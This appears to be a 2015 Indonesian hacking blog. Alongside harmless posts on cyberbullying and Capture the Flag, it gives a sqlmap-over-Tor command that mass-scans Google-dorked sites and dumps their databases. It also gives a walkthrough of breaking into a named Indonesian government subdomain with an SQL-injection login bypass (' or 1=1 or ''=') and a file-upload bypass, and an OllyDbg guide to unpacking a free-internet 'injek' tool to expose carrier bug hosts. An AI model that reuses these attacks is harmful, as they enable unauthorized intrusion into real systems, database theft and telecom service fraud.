Sabtu, 29 Agustus 2015

Dampak Cyber Bullying lebih berbahaya !

Tidak ada komentar :

Menurut psikolog fenomena cyberbullying lebih berbahaya dibandingkan dengan bullying fisik, karena tindakan ini terjadi selama 24 jam dan rerata tidak dapat diawasi oleh orang tua.

Psikolog Katarina Ira Puspita yang tergabung di Kasandra And Associates Psychological Practice mengatakan tindakan cyberbullying merupakan salah-satu dampak penggunaan teknologi informasi dan tindakan ini sangat berbahaya. “Bisa berdampak terhadap tindakan bunuh diri bagi si korban cyberbullying,” tuturnya

Menurutnya, yang menyebabkan tindakan cyberbullying ini sangat berbahaya dibandingkan dengan bullying fisik a.l. Pertama, cyberbullying terjadi selama 24 jam nonstop dan secara otomatis korban menerima bullying selama itu. Kedua, cyberbullying rerata tidak dapat diawasi oleh orang tua atau orang dewasa yang bisa mencegah atau menghilangkan tindakan cyberbullying ini.

Terutama tanda atau dampak dari tindakan ini tidak terlihat seperti bullying fisik yang mudah bisa terlihat atau diawasi. Ketiga, cyberbullying pun rerata tidak disadari oleh rerata orang tua. Katarina menjelaskan ada hal-hal yang perlu dikenali atau jika anak kita menjadi korban cyberbullying.

Pertama, biasanya anak akan cenderung menarik diri dari lingkungan sosial baik itu lingkungan keluarga hingga sekitarnya. Tanda kedua yakni emosi anak yang cenderung lebih banyak murung dan bersedih parahnya jika tidak ada komunikasi dengan si orang tua. Tanda ketiga cenderung enggan untuk kembali sekolah atau kegiatan sosial. Selain itu, tanda lainnya cenderung menunjukkan emosi-emosi negatif seperti sedih, marah, frustasi dan khawatir.

“Dan prestasi belajar pun semakin menurun dari hari ke hari, serta kurang tidur dan kurang nafsu makan,” katanya. Pencegahan Untuk mencegah tindakan cyberbullying orang tua harus memberikan pengertian jika tindakan atau perilaku cyberbullying ini tidak pantas dan akan merugikan orang baik si pelaku maupun korban. Pencegahan lainnya kontrol orang tua kepada anak dalam menggunakan media internet.

Dalam hal ini orang tua harus mengatur berapa jam anak menggunakan internet, situs apa saja yang boleh dibuka dan tidak boleh dibuka serta hal-hal apa saja yang boleh dilakukan dan tidak boleh dilakukan dalam internet khususnya media sosial.

Selain itu, orang tua perlu mengawasi anak bagaimana perilaku anak di media sosial. Apakah anak mengeluarkan komentar-komentar yang pantas atau tidak.Untuk itu dalam jejaring media sosial yang dimiliki anak orang tua pun harus memilikinya serta wajib menjadi teman dalam list teman di media sosial anak.

“Dengan begitu kita bisa mencegah anak kita menjadi korban atau pelaku dari cyberbullying,” imbuhnya. Dan yang tidak kalah penting imbuhnya yakni orang tua harus bisa mengajak anaknya untuk menggunakan media sosial secara sehat.

Kamis, 20 Agustus 2015

Otomatis Sql Injection dengan SqlMap dan Tor

1 komentar :
Apa itu SqlMap ? SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

Pertama tama download tor di sini https://www.torproject.org/ .

atau pada Ubuntu bisa gunakan command : 
sudo apt-get install -y tor

lakukan perinah mulai tor pada Ubuntu :
sudo service tor start

download Sqlmap di sini http://sqlmap.org/

perintah agar otomatis nge scan :

sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15


terima kasih ..

Rabu, 19 Agustus 2015

Penetration Testing SubDomain ekon.go.id

Tidak ada komentar :
Assalamualaikum , kali ini saya akan memposting tentang kelemahan pada SubDomain Kementerian Koordinator Bidang Perekonomian Republik Indonesia .

Vulnerable Type : Bypass Admin Login & Tamper Data
SubDomain : http://pkln.ekon.go.id

Pertama tama login menggunakan Bypass Admin Login yang saya pakai :
user id : ' or 1=1 or ''='
password : ' or 1=1 or ''='

berhasil . tara ..

disitu ada bacaan upload . wah kesempatan nih ..

lanjut kita beraksi .

kita memulai Tamper Data , saya gunakan Mozilla Firefox .

jangan terlalu serius . hahaha .

klik Tools > Tamper Data .

saya rename script saya dengan ekstensi : file.htm.pdf ( karna disitu disebut hanya upload file dokumen pdf )

ok lanjut ..

wah wah . jangan terlalu serius . inget waktu !

klik tamper ..

kita copy dari form box yg kotak gede , ke notepad . dan kita cari file.htm.pdf ubah jadi file.htm

klik tamper deh . sukses , wota .

terima kasih atas kunjungannya . jangan lupa share blog saya ya . biar tambah semangat post nya ..

Selasa, 18 Agustus 2015

Mengenal Capture The Flag ( CTF )

Tidak ada komentar :


Pernahkan anda mendengar istilah Capture the Flag dalam hacking? biasanya disingkat CTF...
Sebenarnya Capture the Flag adalah olahraga outdoor tradisional yang sering dimainkan oleh anak-anak atau kadang-kadang orang dewasa di mana ada dua tim masing-masing memiliki sebuah bendera (atau tanda lainnya) dan tujuannya adalah untuk menangkap bendera tim lain.
Istilah CTF juga digunakan dalam dunia komputer, yang merupakan event yang bersifat game dan edukasi di bidang teknologi sekuriti komputer. Di luar negeri, CTF sudah sering diadakan di acara-acara yang berhubungan dengan dunia sekuriti baik di kampus atau acara internasional. Kompetisi hacking atau CTF ini merupakan lomba mencari dan menemukan celah keamanan di sebuah jaringan computer yang sudah disediakan panitia penyelenggara.

Oleh sebab itu, keberadaan hacker ini tidak merusak system sekuriti pihak lain, kecuali yang sudah disediakan panitia. Jaringan komputer yang disediakan dibuat dan disimulasikan seperti layaknya jaringan internet. Kemudian, peserta lomba akan ditantang untuk mempelajari jaringan komputer yang didesain panitia dan mencari lubang sekuriti yang sengaja dibuat panitia penyelenggara CTF.

Oleh panitia penyelenggara, para peserta dapat menggunakan tools dan metodenya masing-masing. Adapun tools yang kiranya sering digunakan untuk mengakses keamanan jaringan, seperti Nessus, Snort, Kismet, Metasploit Framework, Netcat, Hping, TCPDump, John The Ripper, Cain And Abel, WireShark / Ethereal, dsb (dan saya bingung). Bukan hanya tools/aplikasi yang khusus, bahkan hingga penggunaan sistem operasi khusus untuk menjamah keamanan jaringan, seperti Backtrack (Linux),wireshark dan aplikasi lainya.

Biasanya, CTF dibuat ke dalam beberapa level. Level pertama biasanya bersifat sangat mudah. Kalo hacker profesional, mungkin cuma butuh sekejap mata supaya bisa lolos di level pertama ini.

Level 1 - Server CTF melakukan broadcast IP Address dan MAC Address-nya serta 20 IP Address yang bisa dipake oleh client. Aturan mainnya , setiap peserta yang sudah terhubung ke jaringan harus bisa nge-identifikasi IP Address dan mwncocokkan MAC Address-nya dengan nilai tertentu yang bisa diterima oleh server. Kalo sudah berhasil dapat berapa IP Address dan MAC address kita, kita lanjut ke level selanjutnya.

Level 2 - Di level ini kita di suruh mendeteksi berapa IP Address dan URL dari halaman web yang ada di server. Kalo sudah ketemu, kita buka URL tersebut di browser dan berikutnya akan tampil beberapa baris URL lain yang semuanya sudah di enkripsi. Jadi, kita cuma bisa ngeliat tulisan acak-acakan yang ngga bisa di baca.

Level 3 - Sudah saatnya kita nemuin cara buat menterjemahkan URL yang ter-enkripsi itu dengan suatu software khusus. Informasi yang didapet nanti selain berupa URL juga cara kita buat bisa login ke dalam halaman web server.

Level 4 - Kalau semuanya sudah dapat dipecahkan, terus kita masuk ke dalam server dan mulai mencari data yang dimaksud untuk di capture, kemudian copy file tersebut ke dalem komputer kita dan angkat angan. Maka, pertandingan pun berakhir dengan kalian sebagai pemenangnya.

Senin, 17 Agustus 2015

Mengintip injek lewat Olly DBG

Tidak ada komentar :
Kali ini ane share cerita aja, sekarang ane lagi penasaran ngintipin injek buat internetan gratis. Tadinya sih nyoba smartsniff di kalilinux, tapi kayaknya nggak support. Trouble terus pas milih interface.

Bingung mau pake apa.. Setelah googling kesana kemari, ane nyoba wireshark.. Tapi ane pusing :)

Yah, liat ip sama port semua.. bingung, ngeliat bug host nya gimana ya?

Akhirnya kepikiran untuk menggunakan ollydbg. Dan ternyata di kalilinux pun telah terinstall sejak dari sananya.

Beberapa kali mencoba injek telkomsel, ane langsung ngelihat banyak method dan bug yang selama ini cuman ngawang-awang aja di benak ane.

Maklum, bukan Phreaker ane.. ane cuman pernah belajar buat injek sekali, dan sampe sekarang masih setia pake tuh injek. Yah, pumpung belum mati injeknya. Hehehe..

Nah, ane penasaran sama injek XL, dimana ane dulu pernah make dengan kecepatan full di windows. Soalnya kalo dilinux wajah injeknya nggak keliatan :)

Dulu sempet pernah pengen ngintip pake smartsniff, sayangnya setiap ada aplikasi smartsniff terbuka, otomatis injek akan mati.

Akhirnya ane cuman menikmati injek tersebut. Dan nggak berpikiran untuk ngulik lebih dalam.

Lansung ke Caranya :
Ane nyoba buka pake ollydbg tapi ternyata di protect upx.
Beneran nih? di protect pake upx? entahlah.. ane cuman ngeliat di tulisannya kayak gitu.. :) ada upx upx nya.

Dan di bagian text stringnya isinya jadi bahasa aneh. wedew gagal dong.. :3

Injeknya di protect upx 

Trus ane harus ngapain?


Kalau di windows, ada tools untuk unpacking upx. Tapi di linux ane nggak tahu. Maklum gan, ane bukan cracker. Ane nggak pernah nge-crack sekalipun. Yah ane cuman crackers yang limaribuan, yang biasa dimakan itu.. hehehe..   

Lanjut cerita, ane nyari nyari di google, nggak keliatan apa-apa..

Eh kok nyari di google nggak dapet dapet.. 

Oh ya ampun, koneksinya putus.. Pantes. 

Oke, setelah ngotak-atik string pencarian di google, ane dapet sebuah tutorial, untuk unpacking upx. Dan mujurnya, unpackingnya menggunakan Ollydbg.

Keren.. eh.. mampus..

Ollydbg nya udah gua matiin tadi, masa ngulang lagi.. :3


Butuh Plugin Ollydump
Hadeeuh, nginstall plugin ollydbg di kalilinux gimana ya?
Mana pluginnya nggak ada lagi..

Eh mujurnya setelah googling ketemu nih plugin. 

Di situs yang ngasih tutorial cara unpack upx. 
Padahal ane udah googling lama banget tuh.. Dasar nasib.. Orang kurang teliti selalu mujur di awal, dan di akhir, tapi kecebur di tengah... 

Trus gimana cara nginstallnya?

Ah.. gampang.. Kata Situs resminya, ollydbg otomatis akan meload plugin setiap kali di jalankan. Jadi kita tinggal naruh file pluginnya di sana.

Di kali linux, Ollydbg ada di folder  /usr/share/ollydbg/ollydbg.exe

Nah.. ketahuan nih tempatnya :).

Oke tinggal download pluginnya di sini .

Udah di download? 

Tinggal di extract. Trus di kopikan ke folder /usr/share/ollydbg

Oh.. iya, kalo kamu pake user biasa kan nggak boleh. Harus pake root.
Caranya gampang.

Masuk ke folder plugin yang baru di extract tadi.

Klik kanan > open terminal.

sudo cp olly* /usr/share/ollydbg/


Selesai.

Keterangan : olly* itu artinya file dengan nama depan olly  dan nama belakang terserah. :)  

Kan cuman satu. jadi ane tulis pake tanda * soalnya males ngetik.

Mulai duarius eh serius
 Bisa dibilang tutor ini hanyalah kopas dari tutor yang ada. Dan ane juga mempraktekkan sambil ngetik, jadi saya sendiri ketika menulis artikel ini nggak menjamin bahwa kita bisa ngintip injek tersebut.

Ah peduli amat ama berhasil ato enggak.. yang penting penasaran gue ilang.. :)

Oke jadi kita ikutin bareng bareng stepnya ya.. :)

 Ketika kita mbuka injek menggunakan ollydbg, dia akan berhenti di pushad.






 eh btw, udah cek bagian plugins dan ada ollydump nya kan?

kalo belum ya terserah elo..

:p


Lanjut pembahasan.

klik F7 atau tanda yang ane lingkarin.. sekali aja.

   

Kemudian klik di ESP value, yang warna merah tuh.. trus pilih follow in dump


Otomatis dumpnya akan jalan ke titik tertentu.. pilih empat karakter pertama, entah huruf atau apa.. :)

Trus jadikan Breakpoint.



Cie cie.. yang jadi cracker.. serius amat mbacanya.. :) 

Setelah itu klik play.. otomatis program akan berhenti di titik breakpoint.

yang pasti ada tulisannya CMP ESP,EAX.. 

Trus habis itu kita lihat di jump yang terakhir.  Yang ada tulisan JMP nya gede.  Berada di 005BB223.


Maksudnya jump terakhir adalah, jump  terakhir yang tidak di kompress atau di pack. Setelah itu data akan di pack. Di tandai dengan 0x00, atau di ollydbg kita bisa lihat, di bawah JMP terakhir, isinya  00, 00 dan 00 sampe bawah :)

ingat JMP artinya kode ini akan lompat lagi.  




Kita set JMP sebagai breakpoint. 



Klik F7 lagi. Berulang ulang sampe kode lompat dari JMP.

Tapi masalahnya disini programnya lompat bukan dari JMP, tapi dari JNZ.


Oke, JNZ  menunjuk ke data terntentu di belakangnya. ane males nulis, jadi ane klowongi aja gambarnya. :)



Nah, kita harus nyari alamat itu.. tapi males euy.. ngeliat banyak begini..

hehehe..

Tinggal klik F7 sekali dari JNZ pasti lompat ke alamat tersebut.. :)

Kemudian ketika sampe di alamat tersebut.  Klik kanan dan pilih Dump debugged process.


Unpack upx dengan kalilinux 
pun dimulai... 

eh udah dari tadi ding.. Yah  secara teknis kita belum bisa ngintip injeknya.. 
Jadi belum ke unpack.. :p

oke lanjut stepnya..

1. Kita dapet nomer OEP.. 

Ingat kalo nomer OEP yang kita dapet, adalah sepenggal alamat terakhir yang kita debug tadi.. :)

udah ane klowongin alamat OEP nya.. Kalau berbeda dan belum yakin, klik aja GET EIP as OEP .

oh iya.. sebaiknya alamat OEP ini di kopi dulu.. nanti kita butuh loh.. :)


2. Setelah itu centang Rebuild import.




Setelah itu klik Dump. Maka akan muncul jendela sembul untuk nyimpan.
Kasih nama terserah kamu. Disini ane ngasih nama "Dump.exe".



Perlu diingat kalo program ini belum fix. Artinya Dump.exe ini belum bisa di intip :) atau di unpack.

Masih harus ngefix-kan dump.exe dulu. 

Caranya menggunakan Import REConstructor. Kita download file ini..

Sante ganz nggak nyampe setengah mb.  Kamu bisa donlod di sini.


Oke, ekstrak habis itu jalankan Import REConstructor nya. Pilih Program injek yang tadi mau di intip. 

Disini namanya TX.. moga moga yang mbuat nggak mbaca tulisan ini.. entar gue kena omel nih,,, 

Eh kalo anda yang mbuat.. mohon maap bang.. penasaran... Saya janji nggak ngasih tahu bugnya ke orang lain kok.. suer..




  
Nah, masih inget nomer OEP tadi nggak?
yang ane suruh di kopi dulu.. 

DIsini akan di pake lagi..

Kalo kelupaan nggak papa.. nih ane screenshootin caranya lengkap :p


Udah ingetkan? jadi pastekan nomer OEP tadi di yang ane klowongin tuh.. nomer 2.

Terus klik IAT autosearch.

Habis itu klik get import  kemudian Fix dumps.


 
Nanti akan muncul jendela sembul. pilih Dump.exe yang tadi.

Import Reconstructor akan membuat file baru bernama Dump_.exe

Sekarang kita punya dua file.. :)






Dan file Dump_.exe karena sudah fix, bisa kita intip pake Ollydbg.

Matikan pengintipan injek TX tadi. Kemudian restart Ollydbg.
Buka Dump_.exe

Klik kanan > search for > All referenced text String.

Dan Jreng jreng jreng...

Method serta bughostnya udah bisa kita lihat.. :)


Dump_.exe bisa di unpack juga.. :)

cuman ane belum nyoba ngunpack.. Kan targetnya cuman liat bughost doang.



Credits :
- Allah azza wa jalla

- Abang yang udah buat injek TX, biar bagaimanapun, ane dulu make beberapa hari. dan Ngerasain gretongan cepet menggunakan xl.

- http://www.behindthefirewalls.com

- Pembaca yang udah setia ndengerin celotehan saya..

Thanks you..